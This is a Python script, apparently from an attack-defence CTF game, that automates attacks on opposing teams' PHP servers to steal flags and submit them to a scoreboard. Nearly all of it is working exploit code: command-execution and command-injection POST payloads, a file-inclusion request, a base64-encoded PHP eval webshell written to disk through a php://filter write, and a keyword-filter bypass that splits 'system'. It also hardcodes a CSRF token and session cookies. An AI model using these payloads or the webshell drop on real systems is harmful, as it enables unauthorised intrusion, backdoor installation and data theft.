AWD FLAG SCRIPT
AWD FLAG脚本
之前AWD比赛用的自动写马（webshell）并读取flag的脚本。
import json
import random
import re
import secrets
import time

import requests
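def filename():
    """Return a fresh hidden PHP file name for the dropped backdoor.

    The name is a dot-prefixed 8-digit number, e.g. ``.48213796.php``.
    ``secrets`` is used instead of ``random`` so the name cannot be
    predicted from the Mersenne Twister state by a defender watching
    earlier drops; the output format is unchanged.

    Returns:
        str: ``'.' + 8 digits + '.php'``.
    """
    # 10000000 + [0, 90000000) covers exactly the 8-digit range.
    number = 10000000 + secrets.randbelow(90000000)
    return '.' + str(number) + '.php'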
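def exp1(target):
    """Read /flag through the command-execution hole in /admin/test.php.

    Args:
        target: ``host[:port]`` of the victim box; the scheme is added here.

    Returns:
        The flag wrapped as ``'flag{...}'``, or ``None`` when the request
        fails or the response contains nothing UUID-shaped.
    """
    url = 'http://' + target + '/admin/test.php'
    # Offensive payload: `cmd` is evaluated server-side on the target.
    data = {"cmd": "system('cat /flag');"}
    try:
        r = requests.post(url=url, data=data, timeout=3)
    except requests.RequestException as err:
        # Report instead of silently swallowing, so an unreachable box can
        # be told apart from one whose hole has been patched.
        print('[-]Request failed: ' + target + ' (' + str(err) + ')')
        return None
    # Loose UUID-shaped match (8-4-4-4-12 of any characters); first hit wins.
    hits = re.findall(r'.{8}-.{4}-.{4}-.{4}-.{12}', r.text)
    if not hits:
        print('[-]No flag in response: ' + target)
        return None
    res = 'flag{' + hits[0] + '}'
    print('[+]Flag Found: ' + target + '->' + res)
    return res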
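def exp2(target):
    """Read /flag through the file-inclusion parameter of /about.php.

    Args:
        target: ``host[:port]`` of the victim box; the scheme is added here.

    Returns:
        The flag wrapped as ``'flag{...}'``, or ``None`` when the request
        fails or the response contains nothing UUID-shaped.
    """
    # `file` is handed straight to the target; /flag is read server-side.
    url = 'http://' + target + '/about.php?file=/flag'
    try:
        r = requests.get(url=url, timeout=3)
    except requests.RequestException as err:
        # Report instead of silently swallowing, so an unreachable box can
        # be told apart from one whose hole has been patched.
        print('[-]Request failed: ' + target + ' (' + str(err) + ')')
        return None
    # Loose UUID-shaped match (8-4-4-4-12 of any characters); first hit wins.
    hits = re.findall(r'.{8}-.{4}-.{4}-.{4}-.{12}', r.text)
    if not hits:
        print('[-]No flag in response: ' + target)
        return None
    res = 'flag{' + hits[0] + '}'
    print('[+]Flag Found: ' + target + '->' + res)
    return res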
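def exp3(target):
    """Read /flag through the command-injection field of /admin/editor.php.

    Args:
        target: ``host[:port]`` of the victim box; the scheme is added here.

    Returns:
        The flag wrapped as ``'flag{...}'``, or ``None`` when the request
        fails or the response contains nothing UUID-shaped.
    """
    url = 'http://' + target + '/admin/editor.php'
    # Offensive payload: the `boy` field is run as a shell command on the target.
    data = {"boy": "cat /flag"}
    try:
        r = requests.post(url=url, data=data, timeout=3)
    except requests.RequestException as err:
        # Report instead of silently swallowing, so an unreachable box can
        # be told apart from one whose hole has been patched.
        print('[-]Request failed: ' + target + ' (' + str(err) + ')')
        return None
    # Loose UUID-shaped match (8-4-4-4-12 of any characters); first hit wins.
    hits = re.findall(r'.{8}-.{4}-.{4}-.{4}-.{12}', r.text)
    if not hits:
        print('[-]No flag in response: ' + target)
        return None
    res = 'flag{' + hits[0] + '}'
    print('[+]Flag Found: ' + target + '->' + res)
    return res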
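def exp4(target):
    """Drop a one-line PHP backdoor via /admin/type.php, then use it to read /flag.

    The ``m`` parameter carries the base64 of the backdoor source and the
    ``file`` parameter points at a ``php://filter`` write target that decodes
    it on the way to disk. The base64 blob is reproduced byte-for-byte from
    the original payload; do not re-encode or "tidy" it.

    Args:
        target: ``host[:port]`` of the victim box; the scheme is added here.

    Returns:
        The flag wrapped as ``'flag{...}'``, or ``None`` when either request
        fails or the backdoor's output contains nothing UUID-shaped.
    """
    name = filename()
    write_backdoor_url = (
        'http://' + target + '/admin/type.php'
        '?m=sPD9waHAgZXZhbChAJF9QT1NUWydjbWQnXSk7Pz4='
        '&file=php://filter/write=convert.base64-decode/resource=' + name
    )
    getflag_url = 'http://' + target + '/admin/' + name
    data = {"cmd": "system('cat /flag');"}
    try:
        # timeout added: the original write request had none and could hang
        # the whole target loop on a dead box.
        requests.get(url=write_backdoor_url, timeout=3)
        # print() call: the previous `print "..."` statement is Python 2 only
        # and a SyntaxError under the Python 3 the rest of the file targets.
        print("[+]Backdoor is Write in :" + getflag_url)
        # Brief pause so the written file is in place before it is hit.
        time.sleep(1)
        r = requests.post(url=getflag_url, data=data, timeout=3)
    except requests.RequestException as err:
        print('[-]Request failed: ' + target + ' (' + str(err) + ')')
        return None
    # Loose UUID-shaped match (8-4-4-4-12 of any characters); first hit wins.
    hits = re.findall(r'.{8}-.{4}-.{4}-.{4}-.{12}', r.text)
    if not hits:
        print('[-]No flag in response: ' + target)
        return None
    res = 'flag{' + hits[0] + '}'
    print('[+]Flag Found: ' + target + '->' + res)
    return res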
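def exp5(target):
    """Read /flag through the PHP injection in /admin/articlelist.php.

    The ``str`` parameter smuggles ``system(current(current($GLOBALS)))`` with
    the function names split by dots to dodge a keyword filter; ``a`` supplies
    the command that ends up being run.

    Args:
        target: ``host[:port]`` of the victim box; the scheme is added here.

    Returns:
        The flag wrapped as ``'flag{...}'``, or ``None`` when the request
        fails or the response holds fewer than two UUID-shaped strings.
    """
    url = ('http://' + target + '/admin/articlelist.php'
           '?a=cat%20/flag&str=2;$a=sys.tem;$b=curr.ent;$a($b($b($GLOBALS)));')
    try:
        r = requests.get(url=url, timeout=3)
    except requests.RequestException as err:
        # Report instead of silently swallowing, so an unreachable box can
        # be told apart from one whose hole has been patched.
        print('[-]Request failed: ' + target + ' (' + str(err) + ')')
        return None
    hits = re.findall(r'.{8}-.{4}-.{4}-.{4}-.{12}', r.text)
    # The original script takes the SECOND match, presumably because the page
    # echoes something UUID-shaped before the flag — confirm on a live target.
    if len(hits) < 2:
        print('[-]No flag in response: ' + target)
        return None
    res = 'flag{' + hits[1] + '}'
    print('[+]Flag Found: ' + target + '->' + res)
    return res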
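def exp6(target):
    """Read the flag from a pre-planted ``/.aa`` file on the target.

    This relies on a file already left on the box by an earlier exploit;
    nothing is written here.

    Args:
        target: ``host[:port]`` of the victim box; the scheme is added here.

    Returns:
        The flag wrapped as ``'flag{...}'``, or ``None`` when the request
        fails or the response contains nothing UUID-shaped.
    """
    url = 'http://' + target + '/.aa'
    try:
        r = requests.get(url=url, timeout=3)
    except requests.RequestException as err:
        # Report instead of silently swallowing, so an unreachable box can
        # be told apart from one where the file has been cleaned up.
        print('[-]Request failed: ' + target + ' (' + str(err) + ')')
        return None
    # Loose UUID-shaped match (8-4-4-4-12 of any characters); first hit wins.
    hits = re.findall(r'.{8}-.{4}-.{4}-.{4}-.{12}', r.text)
    if not hits:
        print('[-]No flag in response: ' + target)
        return None
    res = 'flag{' + hits[0] + '}'
    print('[+]Flag Found: ' + target + '->' + res)
    return res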
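def submit(flag_value, *, csrf_token='c7b3f18a7eac5935b8f4279e53be8824fc304d85599c6e5ebd9ae4e701bb640e',
           cookie='PHPSESSID=to9lsb0m9jrpv1hmdg37he5aa2; session=1f8b1fe6-ab39-4fa4-a03d-617a80f0b2b7'):
    """Post a captured flag to the scoreboard's attempt endpoint.

    Args:
        flag_value: the ``'flag{...}'`` string returned by an ``exp*`` helper.
            Falsy values (``None`` from a failed exploit, ``''``) are not
            submitted, so a missed target no longer posts ``null``.
        csrf_token: value for the ``CSRF-Token`` header. Defaults to the
            session-bound token captured from the browser; it is a live
            credential for the scoreboard account, so rotate it each game
            and keep it out of version control.
        cookie: raw ``Cookie`` header (``PHPSESSID`` + ``session``), same
            caveat as ``csrf_token``.

    Returns:
        The scoreboard's response body, or ``None`` when nothing was sent.
    """
    if not flag_value:
        print('[-]Nothing to submit')
        return None
    url = 'http://x.x.x.x:8000/api/v1/challenges/attempt'
    data = json.dumps({"challenge_id": 1, "submission": flag_value})
    headers = {
        'Accept': 'application/json',
        'CSRF-Token': csrf_token,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36',
        'Content-Type': 'application/json',
        'Origin': 'http://x.x.x.x:8000',
        'Referer': 'http://x.x.x.x:8000/challenges',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Cookie': cookie,
        'Connection': 'close',
    }
    # Session is closed on exit instead of leaking its connection pool.
    # verify=False is a no-op for this http:// URL, but it silently disables
    # certificate checking if the scoreboard ever moves to https — drop it then.
    with requests.Session() as s:
        req = s.post(url=url, headers=headers, data=data, verify=False)
    print(req.text)
    return req.text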
if __name__ == "__main__":
    # One victim box per team: ports 30880, 30980, 31080 ... 31480 on the
    # shared host. Swap the commented exp*/submit lines to change the attack.
    for box in range(8, 15):
        ip = "x.x.x.x:3%02d80" % box
        # flag = exp1(ip)
        flag = exp2(ip)
        # flag = exp3(ip)
        # flag = exp4(ip)
        # flag = exp5(ip)
        # flag = exp6(ip)
        # submit(flag)
        # exp5 payload for reference:
        # a=cat%20/flag&str=2;$a=sys.tem;$b=curr.ent;$a($b($b($GLOBALS)));